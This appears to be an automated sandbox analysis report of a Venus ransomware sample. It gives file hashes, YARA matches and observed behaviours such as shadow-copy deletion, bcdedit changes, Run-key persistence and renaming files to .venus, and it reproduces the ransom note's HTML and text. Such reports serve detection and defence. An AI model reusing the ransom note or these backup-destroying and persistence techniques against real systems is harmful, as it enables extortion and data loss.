Analysis
-
max time kernel
101s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2022 04:50
Behavioral task
behavioral1
Sample
fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
Resource
win7-20221111-en
windows7-x64
15 signatures
150 seconds
Behavioral task
behavioral2
Sample
fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
Resource
win10v2004-20221111-en
windows10-2004-x64
24 signatures
150 seconds
General
-
Target
fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe
-
Size
225KB
-
MD5
f62590e838b1d13960abb6b363e03ed9
-
SHA1
66f706a7d39038964471e0a009a76e0f978fb075
-
SHA256
fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3
-
SHA512
7d372043b31cca8d6d73ecd386e08d720ec29fa02e6c01b099c70977e7bdbd06f2a2a8c44f1b813c1a4b67b12a37a51efcfc3776e8667ed216b25d2bf1d56556
-
SSDEEP
6144:IuC7JmXiQwAh6jkJwkNV50DEr9MxgTw7ozFD254W:IuCteiQwAjw1DDGcopfW
Score
10/10
Malware Config
Extracted
Path
C:\README.html
Ransom Note
<html><head><title>Venus</title><style type = "text/css">*{padding:0;margin:0}p{color:white}.f{background-color:#ff7c00;width:100%;margin-left:auto;margin-right:auto;height:100%}.c h1{color:white;line-height:80px}.r{word-break:break-all;float:left;width:100%;text-align:center}</style></head><body><div class="f"><div class="c"><h1 align="center"><<<Venus>>></h1></div><div class="r"><p></br></br></br></br><strong>We downloaded and encrypted your data.</strong></br>Only we can decrypt your data.<br><strong>IMPORTANT!</strong><br> If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.<br> In this case we will not be able to help you.<br>Do not play with files.</p><p>Do not rename encrypted files.<br>Do not try to decrypt your data using third party software, it may cause permanent data loss.<br>Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.</br>-----------------------------------------------------</br>Contact and send this file to us:<br><strong><br>email:[email protected]<br>email:[email protected]<br></strong><br><br>7tHcfikjaWfTUUQi1kF4/IpRAHcm3O9U8KwEbX+hYTWWtdPCTp1j+amG/hwc/ff7
W5hdcXuUUdNz5ctjkpvYvJTI0hvnIVuT/qua5Ia8HTV5jdjtBhO5CwxiCoyV29k5
I+OOoxMV/qujZrYStLFjBbPKeaCIg+zKRBpF4ylSY8Gv6i+zHIgNUPaSKrNKJ7G9
iqimwPqmZBPZLUHA228iP144WebJTgBBrx97xxOAtlY8Yw4SH5O1EMA/VFr8ZxHE
e7vBYUSVWKEPd8deN817uBxttArs0CZiHFMq72Re9ImTJHGkjpSAlg0cR+sx3oS/
iIoXY8VYnQyHhc1nzszlTdUAT3AsPuq/g1omgDXZ6uLpOFVdvLc10yph3mnH8wu/
e88ezM3wGRv0/LJY9ZDXEJGKaOOdTasAsXDXVcjgJErV4f5JE7fKNtvhT+GUgCPI
thtzOfTYNjRL5TbB7xPlTIEKrVGQEK6qQ9B+wC5TEKya0cZUB3aH72YhSXHu9ju2
r15OjoKjlDgs4OulkN3qyfQo15KULC1HPcDx2W//pga/usSrDxafOx7wzIlzEZwf
I2zlmYvJKsInCZ/Y+MagidXlqByaKMTuJHLGLFi3kDCLPlR8WCdj46MueejWjTFu
LuO66VrSeuV80fg=
</p></div></body></html></html></body></html>
Emails
us:<br><strong><br>email:[email protected]<br>email:[email protected]<br></strong><br><br>7tHcfikjaWfTUUQi1kF4/IpRAHcm3O9U8KwEbX+hYTWWtdPCTp1j+amG/hwc/ff7
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\180596361972527219.hta
Ransom Note
<<<Venus>>>
We downloaded and encrypted your data.Only we can decrypt your data.IMPORTANT!
If you, your programmers or your friends would try to help you to decrypt the files it can cause data loss even after you pay.
In this case we will not be able to help you.
Do not play with files.
Do not rename encrypted files.
Do not try to decrypt your data using third party software, it may cause permanent data loss.
Decryption of your files with the help of third parties may cause increased price or you can become a victim of a scam.-----------------------------------------------------Contact and send this file to us:
email:[email protected]
email:[email protected]
Emails
Signatures
-
Venus
Venus is a ransomware first seen in 2022.
-
Venus Ransomware 5 IoCs
resource yara_rule behavioral2/memory/4300-132-0x0000000000400000-0x000000000043E000-memory.dmp family_venus behavioral2/files/0x0005000000022662-134.dat family_venus behavioral2/memory/4912-135-0x0000000000400000-0x000000000043E000-memory.dmp family_venus behavioral2/files/0x0005000000022662-137.dat family_venus behavioral2/memory/4912-143-0x0000000000400000-0x000000000043E000-memory.dmp family_venus -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
pid Process 3512 bcdedit.exe -
pid Process 6024 wbadmin.exe -
Executes dropped EXE 1 IoCs
pid Process 4912 fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 1372 netsh.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\InstallConfirm.raw => C:\Users\Admin\Pictures\InstallConfirm.raw.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Pictures\InstallConfirm.raw.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File renamed C:\Users\Admin\Pictures\UninstallCompare.png => C:\Users\Admin\Pictures\UninstallCompare.png.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Pictures\UninstallCompare.png.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe = "C:\\Windows\\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe" fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Public\Downloads\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Pictures\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Videos\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Searches\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Music\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Music\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Documents\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Videos\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Documents\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Links\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-4246620582-653642754-1174164128-1000\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification \Device\HarddiskVolume1\$RECYCLE.BIN\S-1-5-21-4246620582-653642754-1174164128-1000\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files (x86)\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification \??\E:\$RECYCLE.BIN\S-1-5-21-4246620582-653642754-1174164128-1000\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Libraries\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Users\Public\Desktop\desktop.ini fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened (read-only) \??\F: fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\180596361972527219.jpg" fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-100_contrast-white.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\cs.pak.DATA fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_OEM_Perp-ppd.xrm-ms.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ul-oob.xrm-ms.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN048.XML fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\sql70.xsl fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\6.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-time-l1-1-0.dll.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr.jar fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\osmmui.msi.16.en-us.tree.dat.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-200.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACETXT.DLL fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\EXPEDITN\PREVIEW.GIF.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Mozilla Firefox\plugin-container.exe.sig fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\SubmitLimit.WTV.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-64_contrast-white.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\images\PaySquare150x150Logo.scale-200.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SmallTile.scale-100_contrast-white.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\PREVIEW.GIF fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileLargeSquare.scale-200.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\256x256.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.StorePurchaseApp_11811.1001.1813.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2020.1906.55.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-100.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RInt.16.msi.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-pl.xrm-ms fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Delete.White.png.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymt.ttf fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui_3.106.0.v20140812-1751.jar fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp7.scale-125.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\mso98imm.dll fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jawt.dll fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\glib-lite.dll.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.DLL.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dll fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-125.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-ms.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\BillingStatement.xltx fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-black_scale-200.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.scale-400.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\video_offline_demo_page2.jpg fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\onnxruntime.dll fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\java-rmi.exe.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\SmallTile.scale-125.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-256_altform-unplated_contrast-white.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\1850_32x32x32.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.scale-100.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\MSFT_PackageManagement.psm1.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\offreg.dll fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe File created C:\Windows\180596361972527219.png fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5936 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 4748 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.venus\DefaultIcon fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.venus\DefaultIcon\ = "C:\\Windows\\180596361972527219.png" fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.venus fa57cf745ea986627cfeb9615038685304457812f262d3e20bd4ee0a70145bb3.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4576 PING.EXE -
Suspicious use of AdjustPrivilegeToken 53 IoCs
